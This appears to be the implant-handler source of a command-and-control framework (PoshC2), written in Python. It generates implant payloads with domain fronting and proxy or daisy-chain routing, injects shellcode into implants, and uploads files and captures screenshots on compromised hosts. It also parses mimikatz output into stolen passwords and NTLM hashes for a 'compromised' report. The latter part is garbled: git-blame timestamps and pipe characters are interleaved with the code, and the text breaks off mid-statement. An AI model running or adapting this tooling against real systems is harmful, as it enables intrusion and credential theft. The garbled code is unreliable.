#!/usr/bin/python
import os, time, readline, base64, re, traceback, glob, sys, argparse, shlex, signal, subprocess, argparse, datetime
from sqlite3 import Error
from Help import *
from AutoLoads import *
from DB import *
from Colours import *
from Config import *
from HTML import *
from TabComplete import *
from Payloads import *
from Core import *
from Alias import *
from Opsec import *
from Utils import validate_sleep_time
def catch_exit(signum, frame):
    """Signal handler that ends the process with exit status 0.

    Args:
        signum: the delivered signal number (unused).
        frame: the interrupted stack frame (unused).
    """
    # Equivalent to sys.exit(0): SystemExit unwinds to the interpreter.
    raise SystemExit(0)
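# Field names a mimikatz record may carry; missing ones are normalised to ''.
_MIMIKATZ_FIELDS = ('Domain', 'Username', 'NTLM', 'SHA1', 'Password')
# "* Username : <value>" opens a new record.
_MIMIKATZ_USER_RE = re.compile(r'^\s*\*\s+Username\s+:\s+(.+)\s*$')
# "* <Field> : <value>" attaches a field to the record currently being built.
_MIMIKATZ_FIELD_RE = re.compile(r'^\s*\*\s+(Domain|NTLM|SHA1|Password)\s+:\s+(.+)\s*$')


def process_mimikatz(lines):
    """Parse mimikatz logon-password text into (username, password, ntlm) tuples.

    Adapted from https://github.com/stufus/parse-mimikatz-log/blob/master/pml.py

    Args:
        lines: the raw text, one "* Field : value" entry per line.

    Returns:
        Distinct ``(username, password, ntlm)`` tuples in order of first
        appearance. Records without a username, or with neither a password
        nor an NTLM value, are dropped (see process_mimikatzout).

    Note:
        A record is only emitted when the *next* "Username" line is seen, so
        the last record in the text is never flushed. This matches the
        original parser's behaviour and is preserved here.
    """
    results = []
    current = {}
    for line in lines.split('\n'):
        stripped = line.strip()
        user_match = _MIMIKATZ_USER_RE.match(stripped)
        if user_match is not None:
            # A new username closes the previous record.
            record = process_mimikatzout(current)
            if record is not None and record not in results:
                results.append(record)
            current = {'Username': user_match.group(1).strip()}
            continue
        field_match = _MIMIKATZ_FIELD_RE.match(stripped)
        # Heuristic inherited from the upstream parser: a value with ten or
        # more spaces is skipped (presumably prose rather than a field value).
        if field_match is not None and field_match.group(2).count(" ") < 10:
            current[field_match.group(1).strip()] = field_match.group(2)
    return results


def process_mimikatzout(current):
    """Normalise one parsed record and return it as a credential tuple.

    Mutates ``current`` in place: each name in _MIMIKATZ_FIELDS is filled in
    with '' when absent, and the literal '(null)' is replaced by ''.

    Args:
        current: dict mapping field name to value for one record.

    Returns:
        ``(username, password, ntlm)`` when a username and at least one of
        password / NTLM are non-empty, otherwise None.
    """
    for field in _MIMIKATZ_FIELDS:
        if field not in current or current[field] == '(null)':
            current[field] = ''
    if current['Username'] != '' and (current['Password'] != '' or current['NTLM'] != ''):
        return current['Username'], current['Password'], current['NTLM']
    return None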
def createproxypayload():
    """Interactively build the "Proxy" payload set and record its URL details.

    Prompts for proxy user, password, URL and credential expiry, writes the
    proxy settings to the C2Server table, generates each payload format via
    Payloads, registers the URL with new_urldetails and returns to the
    startup() menu. Relies on the module-level ``user``.
    """
    proxyuser = raw_input("Proxy User: e.g. Domain\\user ")
    proxypass = raw_input("Proxy Password: e.g. Password1 ")
    proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
    credsexpire = raw_input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
    # Stored on the C2Server row before the row is re-read below.
    update_item("ProxyURL", "C2Server", proxyurl)
    update_item("ProxyUser", "C2Server", proxyuser)
    update_item("ProxyPass", "C2Server", proxypass)
    C2 = get_c2server_all()
    # C2 is the positional C2Server row. The show-serverinfo formatter in
    # startup() labels these columns (e.g. [5] KillDate, [2] EncKey,
    # [1] HostnameIP, [3] DomainFrontHeader) — verify against the DB schema
    # before relying on that mapping.
    newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
                          C2[13], C2[11], "", "", C2[19], C2[20],
                          C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
    newPayload.CreateRaw("Proxy")
    newPayload.CreateDlls("Proxy")
    newPayload.CreateShellcode("Proxy")
    newPayload.CreateEXE("Proxy")
    newPayload.CreateMsbuild("Proxy")
    new_urldetails( "Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire )
    startup(user, "Created new proxy payloads")
def createdaisypayload():
    """Interactively build a "daisy" payload set that stages through an existing implant.

    Prompts for a name, the domain/URL, the daisy host and port and the ID of
    the implant to chain through; generates each payload format via Payloads,
    records the URL with new_urldetails and returns to the startup() menu.
    Relies on the module-level ``user``.
    """
    name = raw_input("Daisy name: e.g. DC1 ")
    domain = raw_input("Domain or URL: https://www.example.com ")
    daisyurl = raw_input("Daisy host: .e.g. http://10.150.10.1 ")
    daisyport = raw_input("Daisy port: .e.g. 8888 ")
    daisyhostid = raw_input("Select Daisy Implant Host: e.g. 5 ")
    daisyhost = get_implantbyid(daisyhostid)
    # Passed to Payloads in the slot that createnewpayload() leaves empty (""),
    # so it is presumably spliced into the payload's proxy setup — confirm in Payloads.
    proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
    C2 = get_c2server_all()
    # C2 is the positional C2Server row; see the show-serverinfo formatter in
    # startup() for the column labels this file assumes.
    newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "",
                          "", proxynone, C2[19], C2[20],
                          C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory)
    # Rewrites the "$pid;<host:port>" marker to "$pid;<domain>@<hostname>" of the
    # chosen implant; indexes 11 and 3 are the Domain and Hostname columns that
    # startup() reads from an implant row.
    newPayload.C2Core = (newPayload.C2Core).replace("$pid;%s" % (daisyurl+":"+daisyport),"$pid;%s@%s" % (daisyhost[11],daisyhost[3]))
    newPayload.CreateRaw(name)
    newPayload.CreateDlls(name)
    newPayload.CreateShellcode(name)
    newPayload.CreateEXE(name)
    newPayload.CreateMsbuild(name)
    # NOTE(review): argument order differs from the other create* functions
    # (daisyurl/daisyhostid occupy the proxy-URL/user slots) — confirm this is
    # intentional against new_urldetails' signature.
    new_urldetails( name, C2[1], C2[3], domain, daisyurl, daisyhostid, "" )
    startup(user, "Created new %s daisy payloads" % name)
def createnewpayload():
    """Interactively build a standard payload set for a new C2 URL.

    Prompts for the domain/URL, domain-front host and an optional proxy URL;
    when a proxy is given, proxy credentials and expiry are also requested
    and the payload name is prefixed with "Proxy". Generates each payload
    format via Payloads, records the URL with new_urldetails and returns to
    the startup() menu. Relies on the module-level ``user``.
    """
    domain = raw_input("Domain or URL: https://www.example.com ")
    # The scheme is stripped only from the copy used to name the payload files.
    domainbase = (domain.lower()).replace('https://','')
    domainbase = domainbase.replace('http://','')
    domainfront = raw_input("Domain front URL: e.g. fjdsklfjdskl.cloudfront.net ")
    proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
    randomid = randomuri(5)
    proxyuser = ""
    proxypass = ""
    credsexpire = ""
    if proxyurl:
        proxyuser = raw_input("Proxy User: e.g. Domain\\user ")
        proxypass = raw_input("Proxy Password: e.g. Password1 ")
        credsexpire = raw_input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
        # "?p" suffix marks the proxy variant of the implant URL.
        imurl = "%s?p" % get_newimplanturl()
        domainbase = "Proxy%s%s" % (domainbase,randomid)
    else:
        domainbase = "%s%s" % (randomid,domainbase)
        imurl = get_newimplanturl()
    C2 = get_c2server_all()
    # C2 is the positional C2Server row; see the show-serverinfo formatter in
    # startup() for the column labels this file assumes.
    newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser,
                          proxypass, proxyurl, "", "", C2[19], C2[20],
                          C2[21], imurl, PayloadsDirectory)
    newPayload.CreateRaw("%s_" % domainbase)
    newPayload.CreateDlls("%s_" % domainbase)
    newPayload.CreateShellcode("%s_" % domainbase)
    newPayload.CreateEXE("%s_" % domainbase)
    newPayload.CreateMsbuild("%s_" % domainbase)
    newPayload.CreatePython("%s_" % domainbase)
    new_urldetails( randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire )
    startup(user, "Created new payloads")
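def argp(cmd):
    """Parse an ``upload-file`` style command line into its named options.

    Recognised options are -Source and -Destination (required) plus -Help
    and -NotHidden (optional); unknown tokens are ignored. ``cmd`` is split
    with shlex, so POSIX quoting and backslash-escaping rules apply.

    Args:
        cmd: the full command string.

    Returns:
        The argparse Namespace on success, or the empty string "" when the
        command cannot be parsed (missing required option, bad quoting, or
        argparse's usage error). Callers must check for "" before reading
        ``.source`` / ``.destination``.
    """
    args = ""
    try:
        parser = argparse.ArgumentParser(add_help=False)
        parser.add_argument('-Help', '-help', '-h', action='store', dest='help', required=False)
        parser.add_argument('-Source', '-source', action='store', dest='source', required=True)
        parser.add_argument('-Destination', '-destination', action='store', dest='destination', required=True)
        parser.add_argument('-NotHidden', '-nothidden', action='store', dest='nothidden', required=False)
        args, _unknown = parser.parse_known_args(shlex.split(cmd))
    except (Exception, SystemExit):
        # argparse reports a missing required option by raising SystemExit
        # (after printing usage), and shlex raises ValueError on unbalanced
        # quotes; both mean "unparseable". KeyboardInterrupt is no longer
        # swallowed by a bare except.
        pass
    return args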
def filecomplete(text, state):
    """readline completer for files under PayloadsDirectory.

    Changes the process working directory to PayloadsDirectory (a side
    effect that persists after completion) and returns the ``state``-th
    glob match for ``text*``, or None once the matches are exhausted.
    """
    os.chdir(PayloadsDirectory)
    candidates = glob.glob(text + '*')
    # readline stops calling once it receives None.
    candidates.append(None)
    return candidates[state]
def readfile_with_completion(message):
    """Prompt for a path with filename tab-completion, then restore command completion.

    Args:
        message: the prompt shown to the operator.

    Returns:
        The raw string entered (not validated here).
    """
    readline.set_completer(filecomplete)
    path = raw_input(message)
    # Swap the COMMANDS completer back in; note this is skipped if raw_input raises.
    completer = tabCompleter()
    completer.createListCompleter(COMMANDS)
    readline.set_completer(completer.listCompleter)
    return path
def complete(text, state):
    """readline completer over the module-level COMMANDS list.

    Returns the ``state``-th command that starts with ``text`` (in COMMANDS
    order), or None when there is no such match.
    """
    matches = (cmd for cmd in COMMANDS if cmd.startswith(text))
    for index, cmd in enumerate(matches):
        if index == state:
            return cmd
    return None
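def load_file( location ):
    """Read a file's bytes, returning None if it is missing, unreadable or empty.

    Args:
        location: path of the file to read.

    Returns:
        The file contents as bytes, or None. Errors are printed rather than
        raised; an empty file also yields None because its contents are falsy.
    """
    try:
        # The context manager closes the handle even if read() fails
        # (the original left the handle open).
        with open(location, "rb") as handle:
            contents = handle.read()
    except Exception as e:
        print ("Error loading file %s" % e)
        return None
    return contents if contents else None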
def migrate(randomuri, params=""):
    """Queue an Inject-Shellcode task for the implant identified by ``randomuri``.

    Selects the shellcode file under ROOTDIR/payloads from the implant's
    recorded architecture and comms type, stages it base64-encoded in a
    $Shellcode<arch> variable, then tasks Inject-Shellcode with ``params``
    appended verbatim. Relies on the module-level ``user``.

    Args:
        randomuri: the implant key passed to get_implantdetails.
        params: extra text appended to the Inject-Shellcode command line.
    """
    implant = get_implantdetails(randomuri)
    # Same column indexes startup() reads from an implant row (10 = Arch, 15 = Pivot/comms).
    implant_arch = implant[10]
    implant_comms = implant[15]
    if implant_arch == "AMD64":
        arch = "64"
    else:
        arch = "86"
    if implant_comms == "Normal":
        shellcodefile = load_file("%s/payloads/Posh-shellcode_x%s.bin" % (ROOTDIR,arch))
    elif implant_comms == "Daisy":
        daisyname = raw_input("Name required: ")
        shellcodefile = load_file("%s/payloads/%sPosh-shellcode_x%s.bin" % (ROOTDIR,daisyname,arch))
    elif implant_comms == "Proxy":
        shellcodefile = load_file("%s/payloads/ProxyPosh-shellcode_x%s.bin" % (ROOTDIR,arch))
    # NOTE(review): any other comms value leaves shellcodefile unbound, and
    # load_file() returns None on failure; either surfaces as an exception at
    # b64encode below rather than as a clear message.
    check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
    new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
    new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
def startup(user, printhelp = ""):
    """Clear the screen, list implants, and run one round of the top-level menu.

    Every menu action ends by calling startup() again (there is no loop and
    no early return), so each command deepens the recursion by one frame and
    the function never returns under normal use. Input not matched by a menu
    keyword is handed to commandloop() as an implant selection.

    Args:
        user: operator name shown in the banner and attached to queued tasks.
        printhelp: optional text printed after the implant list (command
            output from the previous round).
    """
    try:
        if os.name == 'nt':
            os.system('cls')
        else:
            os.system('clear')
    except Exception as e:
        # Fallback: ANSI clear-screen escape.
        print ("cls")
        print (chr(27) + "[2J")
    print (Colours.GREEN + "")
    print (logopic)
    print ("")
    try:
        if user is not None:
            print ("User: %s" % user)
            print (Colours.END)
        ii = get_implants()
        if ii:
            for i in ii:
                # Positional implant-row columns; the same indexes are used by
                # migrate() and the opsec report below.
                ID = i[0]
                RandomURI = i[1]
                LastSeen = i[7]
                Hostname = i[3]
                Domain = i[11]
                DomainUser = i[2]
                Arch = i[10]
                PID = i[8]
                Pivot = i[15]
                Sleep = i[13]
                Label = i[16]
                # Short comms-type tag for the listing.
                if Pivot == "Daisy": Pivot = "D"
                elif Pivot == "C#": Pivot = "C#"
                elif Pivot == "Proxy": Pivot = "P"
                elif Pivot == "Python": Pivot = "PY"
                elif Pivot == "OSX": Pivot = "PY"
                else: Pivot = "PS"
                # NOTE(review): this local import rebinds the name `datetime`
                # (imported as a module at the top of the file) to the class
                # for the rest of this function.
                from datetime import datetime, timedelta
                LastSeenTime = datetime.strptime(LastSeen,"%m/%d/%Y %H:%M:%S")
                now = datetime.now()
                # Sleep is stored as "<n>s|m|h"; anything else skips the row.
                if(Sleep.endswith('s')):
                    sleep_int = int(Sleep[:-1])
                elif(Sleep.endswith('m')):
                    sleep_int = int(Sleep[:-1]) * 60
                elif(Sleep.endswith('h')):
                    sleep_int = int(Sleep[:-1]) * 60 * 60
                else:
                    print(Colours.RED)
                    print("Incorrect sleep format: %s" % Sleep)
                    print(Colours.END)
                    continue
                # Colour thresholds: >10 missed beacons red, >3 yellow, else green.
                nowMinus3Beacons = now - timedelta(seconds=(sleep_int * 3))
                nowMinus10Beacons = now - timedelta(seconds=(sleep_int * 10))
                sID = "["+str(ID)+"]"
                if Label == None:
                    sLabel = ""
                else:
                    sLabel = "["+Label+"]"
                if nowMinus10Beacons > LastSeenTime:
                    print (Colours.RED + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot))
                elif nowMinus3Beacons > LastSeenTime:
                    print (Colours.YELLOW + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot))
                else:
                    print (Colours.GREEN + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot))
        else:
            from datetime import datetime, timedelta
            now = datetime.now()
            print (Colours.RED+"No Implants as of: %s" % now.strftime("%m/%d/%Y %H:%M:%S"))
            print (Colours.END+"")
        if printhelp:
            print (printhelp)
        # Tab completion over PRECOMMANDS and reload of the persisted history.
        t = tabCompleter()
        t.createListCompleter(PRECOMMANDS)
        readline.set_completer_delims('\t')
        readline.parse_and_bind("tab: complete")
        readline.set_completer(t.listCompleter)
        history = get_history_dict()
        if history:
            for command in history:
                try:
                    readline.add_history(command[1])
                except:
                    pass
        implant_id = raw_input("Select ImplantID or ALL or Comma Separated List (Enter to refresh):: ")
        print ("")
        # Record the raw input in the command history unless it repeats the last entry.
        if implant_id:
            try:
                last = get_lastcommand()
                if last:
                    if last != implant_id:
                        new_commandhistory(implant_id)
                else:
                    new_commandhistory(implant_id)
            except Exception as e:
                pass
        # Menu keywords. Most are substring tests on the lowercased input, and
        # none returns afterwards: the nested startup() call only comes back
        # on an exception, at which point the remaining tests still run.
        if (implant_id == "") or (implant_id.lower() == "back") or (implant_id.lower() == "clear"):
            startup(user)
        if "output-to-html" in implant_id.lower():
            generate_table("Tasks")
            generate_table("C2Server")
            generate_table("Creds")
            generate_table("Implants")
            graphviz()
            time.sleep(1)
            startup(user)
        if ("show-urls" in implant_id.lower()) or ("list-urls" in implant_id.lower()):
            urls = get_c2urls()
            urlformatted = "RandomID URL HostHeader ProxyURL ProxyUsername ProxyPassword CredentialExpiry\n"
            for i in urls:
                urlformatted += "%s %s %s %s %s %s %s %s \n" % (i[0],i[1],i[2],i[3],i[4],i[5],i[6],i[7])
            startup(user, urlformatted)
        if "add-autorun" in implant_id.lower():
            autorun = (implant_id.lower()).replace("add-autorun ","")
            autorun = autorun.replace("add-autorun","")
            add_autorun(autorun)
            startup(user, "add-autorun: %s\r\n" % autorun)
        if "list-autorun" in implant_id.lower():
            autoruns = get_autorun()
            startup(user, autoruns)
        if "del-autorun" in implant_id.lower():
            autorun = (implant_id.lower()).replace("del-autorun ","")
            del_autorun(autorun)
            startup(user, "deleted autorun\r\n")
        if "nuke-autorun" in implant_id.lower():
            del_autoruns()
            startup(user, "nuked autoruns\r\n")
        if (implant_id.lower() == "automigrate-frompowershell") or (implant_id.lower() == "am"):
            startup(user, "automigrate not currently implemented for the Python version of PoshC2\r\n")
        if "show-serverinfo" in implant_id.lower():
            # Prints the full C2Server row, including EncKey and proxy credentials, to the console.
            i = get_c2server_all()
            detailsformatted = "\nHostnameIP: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nHTTPResponse: %s\nFolderPath: %s\nServerPort: %s\nQuickCommand: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nEnableSounds: %s\nAPIKEY: %s\nMobileNumber: %s\nURLS: %s\n%sSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nAPIToken: %s\nAPIUser: %s\nEnableNotifications: %s" % (i[1],i[2],i[3],i[4],i[5],i[6],i[7],i[8],i[9],i[10],i[11],i[12],i[13],i[14],i[15],i[16],i[17],i[18],i[19],i[20],i[21],i[22],i[23],i[24])
            startup(user, detailsformatted)
        if "turnoff-notifications" in implant_id.lower():
            update_item("EnableNotifications", "C2Server", "No")
            startup(user, "Turned off notifications on new implant")
        if "turnon-notifications" in implant_id.lower():
            update_item("EnableNotifications", "C2Server", "Yes")
            startup(user, "Turned on notifications on new implant")
        # NOTE(review): the two clockwork commands write to each other's
        # column (apikey -> MobileNumber, number -> APIKEY); confirm intended.
        if "set-clockworksmsapikey" in implant_id.lower():
            cmd = (implant_id.lower()).replace("set-clockworksmsapikey ","")
            cmd = cmd.replace("set-clockworksmsapikey","")
            update_item("MobileNumber", "C2Server", cmd)
            startup(user, "Updated set-clockworksmsapikey: %s\r\n" % cmd)
        if "set-clockworksmsnumber" in implant_id.lower():
            cmd = (implant_id.lower()).replace("set-clockworksmsnumber ","")
            cmd = cmd.replace("set-clockworksmsnumber","")
            update_item("APIKEY", "C2Server", cmd)
            startup(user, "Updated set-clockworksmsnumber (Restart C2 Server): %s\r\n" % cmd)
        if "set-defaultbeacon" in implant_id.lower():
            new_sleep = (implant_id.lower()).replace("set-defaultbeacon ","")
            new_sleep = new_sleep.replace("set-defaultbeacon","")
            if not validate_sleep_time(new_sleep):
                print(Colours.RED)
                print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
                print(Colours.GREEN)
                startup(user)
            else:
                update_item("DefaultSleep", "C2Server", new_sleep)
                startup(user, "Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % new_sleep)
        if "opsec" in implant_id.lower():
            # Engagement summary built from the implant and task tables: hosts,
            # URLs, users, uploaded files and any credentials found in task output.
            implants = get_implants_all()
            comtasks = get_tasks()
            hosts = ""
            uploads = ""
            urls = ""
            users = ""
            creds = ""
            hashes = ""
            for i in implants:
                if i[3] not in hosts:
                    hosts += "%s \n" % i[3]
                if i[9] not in urls:
                    urls += "%s \n" % i[9]
            for t in comtasks:
                # Task row: t[1] implant key, t[2] command, t[3] output, t[4] used below — inferred from usage.
                hostname = get_implantdetails(t[1])
                command = t[2].lower()
                if hostname[2] not in users:
                    users += "%s\\%s @ %s\n" % (hostname[11], hostname[2],hostname[3])
                if "invoke-mimikatz" in t[2] and "logonpasswords" in t[3]:
                    allcreds = process_mimikatz(t[3])
                    for cred in allcreds:
                        if cred != None:
                            if cred[1]:
                                creds += cred[0] + " Password: " + cred[1] + "\n"
                            if cred[2]:
                                hashes += cred[0] + " : NTLM:" + cred[2] + "\n"
                if "Uploaded file" in t[3]:
                    uploadedfile = t[3]
                    uploadedfile = uploadedfile.partition(":")[2]
                    uploadedfile = uploadedfile.partition("\r\n")[0]
                    uploadedfile = uploadedfile.replace("\\\\\\\\","\\\\")
                    uploadedfile = uploadedfile.replace('"',"")
                    uploadedfile = uploadedfile.replace("'","")
                    uploads += "%s %s \n" % (hostname[3], uploadedfile)
                if "uploading file" in command:
                    uploadedfile = command
                    uploadedfile = uploadedfile.partition("uploading file: ")[2].strip()
                    filehash = uploadedfile.partition(" with md5sum:")[2].strip()
                    uploadedfile = uploadedfile.partition(" with md5sum:")[0].strip()
                    uploadedfile = uploadedfile.strip('"')
                    uploads += "%s %s %s\n" % (hostname[3], uploadedfile, filehash)
                if "installing persistence" in t[4].lower():
                    # NOTE(review): looks up the implant by t[2] here but by
                    # t[1] above; one of the two is probably wrong. Also
                    # split(":",1)[1] raises IndexError if no colon is present.
                    hostname = get_implantdetails(t[2])
                    line = t[4].replace('\n','')
                    line = line.replace('\r','')
                    filenameuploaded = line.rstrip().split(":",1)[1]
                    uploads += "%s %s \n" % (hostname[3], filenameuploaded)
            startup(user, "Users Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s" % (users, hosts, urls, uploads, creds, hashes))
        if "listmodules" in implant_id.lower():
            mods = ""
            for modname in os.listdir("%s/Modules/" % POSHDIR):
                mods += "%s\r\n" % modname
            startup(user, mods)
        if "creds" in implant_id.lower():
            startup(user, "creds module not implemented yet")
        if (implant_id.lower() == "pwnself" ) or (implant_id.lower() == "p"):
            # Runs the generated Python dropper on this host (the C2 server itself).
            subprocess.Popen(["python", "%s%s" % (PayloadsDirectory, "py_dropper.py")])
            startup(user)
        if (implant_id.lower() == "tasks" ) or (implant_id.lower() == "tasks "):
            alltasks = ""
            tasks = get_newtasks_all()
            if tasks is None:
                startup(user, "No tasks queued!\r\n")
            else:
                for task in tasks:
                    imname = get_implantdetails(task[1])
                    alltasks += "(%s) %s\r\n" % ("%s\\%s" % (imname[11],imname[2]),task[2])
                startup(user, "Queued tasks:\r\n\r\n%s" % alltasks)
        if (implant_id.lower() == "cleartasks" ) or (implant_id.lower() == "cleartasks "):
            drop_newtasks()
            startup(user, "Empty tasks queue\r\n")
        if "quit" in implant_id.lower():
            # Enter or "y" exits; "n" restarts the menu; anything else falls through.
            ri = raw_input("Are you sure you want to quit? (Y/n) ")
            if ri.lower() == "n":
                startup(user)
            if ri == "":
                sys.exit(0)
            if ri.lower() == "y":
                sys.exit(0)
        if "createdaisypayload" in implant_id.lower():
            createdaisypayload()
        if "createproxypayload" in implant_id.lower():
            createproxypayload()
        if "createnewpayload" in implant_id.lower():
            createnewpayload()
        if (implant_id == "?") or (implant_id == "help"):
            startup(user, pre_help)
        if (implant_id.lower() == "history") or implant_id.lower() == "history ":
            startup(user, get_history())
        if "use " in implant_id.lower():
            # Strip a leading "use " (any case) so the remainder is the implant selection.
            implant_id = implant_id.replace("use ","")
            params = re.compile("use ", re.IGNORECASE)
            implant_id = params.sub("", implant_id)
        commandloop(implant_id, user)
    except Exception as e:
        # NOTE(review): `in e` tests membership on the exception object, not
        # its message, and raises TypeError; `str(e)` is presumably intended,
        # so the database-retry branch is never taken as written.
        if 'unable to open database file' in e:
            startup(user)
        else:
            traceback.print_exc()
            print ("Error: %s" % e)
            print ("Currently no valid implants: sleeping for 10 seconds")
            time.sleep(10)
            startup(user)
def runcommand(command, randomuri):
|
2018-07-23 08:55:15 +00:00
|
|
|
if command:
|
|
|
|
try:
|
|
|
|
last = get_lastcommand()
|
|
|
|
if last:
|
|
|
|
if last != command:
|
|
|
|
new_commandhistory(command)
|
|
|
|
else:
|
|
|
|
new_commandhistory(command)
|
|
|
|
except Exception as e:
|
|
|
|
ExError = e
|
|
|
|
|
|
|
|
implant_type = get_implanttype(randomuri)
|
2018-12-27 12:10:46 +00:00
|
|
|
if implant_type == "OSX":
|
2019-02-03 19:50:40 +00:00
|
|
|
|
|
|
|
# alias mapping
|
|
|
|
for alias in py_alias:
|
|
|
|
if alias[0] == command.lower()[:len(command.rstrip())]:
|
|
|
|
command = alias[1]
|
|
|
|
|
2018-10-30 13:12:40 +00:00
|
|
|
if 'beacon' in command.lower() or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
|
2019-02-12 21:33:46 +00:00
|
|
|
new_sleep = command.replace('set-beacon ', '')
|
2019-02-13 09:29:20 +00:00
|
|
|
new_sleep = new_sleep.replace('setbeacon ', '')
|
|
|
|
new_sleep = new_sleep.replace('beacon ', '')
|
2019-02-12 21:33:46 +00:00
|
|
|
if not validate_sleep_time(new_sleep):
|
|
|
|
print(Colours.RED)
|
|
|
|
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
|
|
|
|
print(Colours.GREEN)
|
|
|
|
else:
|
|
|
|
command = '$sleeptime = %s' % new_sleep
|
|
|
|
new_task(command, user, randomuri)
|
|
|
|
update_sleep(new_sleep, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
2018-12-31 11:15:13 +00:00
|
|
|
elif (command.lower().startswith('label-implant')):
|
|
|
|
label = command.replace('label-implant ', '')
|
|
|
|
update_label(label, randomuri)
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user)
|
2018-12-31 11:15:13 +00:00
|
|
|
|
2018-09-04 08:46:04 +00:00
|
|
|
elif "searchhelp" in command.lower():
|
|
|
|
searchterm = (command.lower()).replace("searchhelp ","")
|
|
|
|
import string
|
|
|
|
helpfull = string.split(py_help1, '\n')
|
|
|
|
for line in helpfull:
|
2019-02-12 17:34:21 +00:00
|
|
|
if searchterm in line.lower():
|
2018-10-27 18:50:47 +00:00
|
|
|
print (line)
|
2018-09-04 18:30:59 +00:00
|
|
|
|
|
|
|
elif "unhide-implant" in command.lower():
|
|
|
|
unhide_implant(randomuri)
|
|
|
|
|
|
|
|
elif "hide-implant" in command.lower():
|
|
|
|
kill_implant(randomuri)
|
|
|
|
|
2018-09-03 16:51:21 +00:00
|
|
|
elif command.lower() == 'sai' or command.lower() == 'sai ':
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task('startanotherimplant', user, randomuri)
|
2018-08-14 22:40:35 +00:00
|
|
|
|
2018-09-03 19:33:38 +00:00
|
|
|
elif "upload-file" in command.lower():
|
|
|
|
source = ""
|
|
|
|
destination = ""
|
2019-01-05 21:21:40 +00:00
|
|
|
s = ""
|
2019-01-05 12:54:49 +00:00
|
|
|
if command.strip().lower() == "upload-file":
|
|
|
|
source = readfile_with_completion("Location of file to upload: ")
|
|
|
|
while not os.path.isfile(source):
|
|
|
|
print("File does not exist: %s" % source)
|
|
|
|
source = readfile_with_completion("Location of file to upload: ")
|
|
|
|
destination = raw_input("Location to upload to: ")
|
|
|
|
else:
|
|
|
|
args = argp(command)
|
|
|
|
source = args.source
|
|
|
|
destination = args.destination
|
2018-09-03 19:33:38 +00:00
|
|
|
try:
|
2019-01-05 12:54:49 +00:00
|
|
|
with open(source, "rb") as source_file:
|
|
|
|
s = source_file.read()
|
2018-09-03 19:33:38 +00:00
|
|
|
if s:
|
2019-01-05 21:21:40 +00:00
|
|
|
sourceb64 = base64.b64encode(s)
|
2019-01-05 12:54:49 +00:00
|
|
|
destination = destination.replace("\\","\\\\")
|
2018-10-27 18:50:47 +00:00
|
|
|
print ("")
|
2019-01-05 21:24:06 +00:00
|
|
|
print ("Uploading %s to %s" % (source, destination))
|
2019-01-05 21:21:40 +00:00
|
|
|
uploadcommand = "upload-file \"%s\":%s" % (destination, sourceb64)
|
2019-02-11 22:06:33 +00:00
|
|
|
new_task(uploadcommand, user, randomuri)
|
2019-01-05 12:54:49 +00:00
|
|
|
else:
|
|
|
|
print("Source file could not be read or was empty")
|
2018-09-03 19:33:38 +00:00
|
|
|
except Exception as e:
|
2018-10-27 18:50:47 +00:00
|
|
|
print ("Error with source file: %s" % e )
|
2018-12-27 12:10:46 +00:00
|
|
|
traceback.print_exc()
|
2018-09-03 19:33:38 +00:00
|
|
|
|
2018-09-04 08:46:04 +00:00
|
|
|
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
|
2018-10-27 18:50:47 +00:00
|
|
|
print (py_help1)
|
2018-09-04 08:46:04 +00:00
|
|
|
|
|
|
|
elif "loadmoduleforce" in command.lower():
|
|
|
|
params = re.compile("loadmoduleforce ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded(params, randomuri, user, force=True)
|
2018-09-04 08:46:04 +00:00
|
|
|
|
|
|
|
elif "loadmodule" in command.lower():
|
|
|
|
params = re.compile("loadmodule ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded(params, randomuri, user)
|
2018-09-04 08:46:04 +00:00
|
|
|
|
2018-08-03 21:47:56 +00:00
|
|
|
elif 'get-screenshot' in command.lower():
|
|
|
|
taskcmd = "screencapture -x /tmp/s;base64 /tmp/s;rm /tmp/s"
|
2019-02-11 17:05:14 +00:00
|
|
|
